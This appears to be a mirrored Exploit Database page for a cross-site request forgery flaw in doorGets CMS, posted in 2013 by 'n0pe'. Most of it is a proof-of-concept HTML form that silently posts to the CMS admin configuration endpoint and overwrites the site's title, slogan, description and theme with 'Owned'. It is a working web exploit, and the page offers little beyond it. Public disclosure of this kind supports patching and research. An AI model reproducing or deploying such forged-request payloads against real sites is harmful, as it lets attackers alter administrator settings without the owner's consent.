doorGets CMS – Cross-Site Request Forgery

• Exploit Database
• 106 阅读

• 作者： n0pe
  日期： 2013-03-01
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/24560/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29

  # Title: Doorgets CSRF Vulnerability # Author: n0pe # Software Link: http://www.doorgets.com/ # Download: http://www.doorgets.com/?sources_cms # Tested: BackBox Linux 3   With this vulnerability you can change the configuration of the site.     Proof of concept:   <html> <body> <form name="csrf" method="post" action="http://localhost/door/admin/?r=config&siteweb"> Title <input type="text" id="website_title" name="website_title" value="Owned"><br /> Slogan <input type="text" id="website_slogan" name="website_slogan" value="Owned"><br /> Description <input type="text" id="website_description" name="website_description" value="Owned"><br /> Copyright <input type="text" id="website_copyright" name="website_copyright" value="lol"><br /> Year of creation <inputtype="text" id="website_year" name="website_year" value="2013"><br /> Keywords <input type="text" id="website_keywords" name="website_keywords" value="Owned"><br /> ID Facebook <input type="text" id="website_id_facebook" name="website_id_facebook" value=""> <br /> Disqus <inputtype="text" id="website_id_disqus" name="website_id_disqus" value=""> <br /> <input type="radio" name="website_theme"id="website_theme_doorgets-home"value="doorgets-home" doorgets-light >doorgets-home<br /> <input type="radio" name="website_theme"id="website_theme_doorgets-light"value="doorgets-light" checked="checked" >doorgets-light<br /> <input type="submit" id="website_submit" name="website_submit" value="Save"> </form> </body> </html>